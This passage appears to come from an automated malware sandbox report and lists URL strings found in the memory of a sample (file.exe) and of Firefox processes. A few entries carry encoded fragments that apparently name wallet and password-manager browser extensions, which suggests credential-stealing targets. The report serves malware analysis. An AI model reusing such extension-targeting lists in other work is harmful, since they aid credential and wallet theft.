Source: firefox.exe, 0000001E.00000003.2999210432.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008852300.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2983687435.00000270E4423000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/Z
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071808582.00000270DB7A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=utf-8&mode=blended&tag=mozill
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://cb979336-dcad-4f54-b8e3-59863639e
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105353259.00000270E4036000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001E.00000002.3087332031.00000270DDB82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2985260452.00000270E45EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2991682330.00000270E44BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search--button-primary-active-bgcolor
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114697021.000030E187A3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3052198523.00000270DA32E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D627F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3029136632.000000DC1CB3C000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3052198523.00000270DA330000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: firefox.exe, 0000001E.00000002.3111886581.00000270E5C5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3002701967.00000270DBF4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3101620325.00000270E23D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/new/resource://gre/modules/AppUpdater.sys.mjsresource://gre/modules/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2380791496.000000000043C000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D614F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.comZ
Source: firefox.exe, 0000001E.00000003.2999210432.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008852300.00000270E4120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 0000001E.00000002.3033402856.00000270D62A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/Z
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.caZ
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: bdb44f72d9.exe, 0000001B.00000002.3339214666.00000000066D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtu.c
Source: firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC74B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC87E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B94000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2999210432.00000270E4118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2958156579.00000270CC674000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 